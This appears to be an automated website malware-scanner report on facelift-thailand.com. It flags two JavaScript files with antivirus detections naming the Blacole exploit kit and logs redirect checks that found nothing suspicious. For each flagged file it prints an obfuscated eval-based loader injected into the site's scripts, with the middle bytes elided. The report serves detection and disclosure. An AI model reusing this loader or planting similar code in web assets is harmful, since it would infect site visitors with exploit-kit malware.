Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/swfobject.js	200 OK Content-Length: 14210 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
http://facelift-thailand.com/x-js/videogallery.js	200 OK Content-Length: 5980 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) ruzagk="s"+"p"+"li"+"t";bjp=window;wghgc="dy";felygy=document;qrvxp="0x";yddqn=(5-3-1);try{++(felygy.body)}catch(zdeacy){pveu=false;try{}catch(hag){pveu=21;} if(1){ncvwn="17:5d:6c:65:5a:6b:60:66:65:17:71:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 ... 3429 bytes are skipped ...c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:27:30:1f:20:32:4:1:74:4:1:74"[ruzagk](":");}bjp=ncvwn;ciwec=[];for(txxb=22-20-2;-txxb+1385!=0;txxb+=1){biteb=txxb;if((0x19==031))ciwec+=String["fromCharCode"](eval(qrvxp+bjp[1*biteb])+0xa-yddqn);}qmvv=eval;qmvv(ciwec)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.JS.Blacole.Z Ikarus Virus.JS.Exploit nProtect JS:Exploit.JS.Blacole.Z TrendMicro-HouseCall TROJ_GEN.F47V1129 Emsisoft JS:Exploit.JS.Blacole.Z (B) Comodo TrojWare.JS.Kryptik.acc McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Kaspersky Exploit.JS.Pdfka.gkj Microsoft Exploit:JS/Blacole.NX MicroWorld-eScan JS:Exploit.JS.Blacole.Z Fortinet JS/Kryptik.AOG!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgxcgz F-Secure JS:Exploit.JS.Blacole.Z VIPRE Exploit.JS.Blacole.nx (v) AVG Script/Exploit.Kit Norman Kryptik.CCLX GData JS:Exploit.JS.Blacole.Z ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.JS.Blacole.Z
https://lct.salesforce.com/sfga.js	500 timeout Content-Length: 30 Content-Type: text/plain	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: facelift-thailand.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 Jun 2014 18:23:06 GMT
Server: Apache
Content-Length: 43356
Content-Type: text/html
X-Powered-By: PHP/5.4.29

...43356 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: facelift-thailand.com
Referer: http://www.google.com/search?q=facelift-thailand.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for facelift-thailand.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools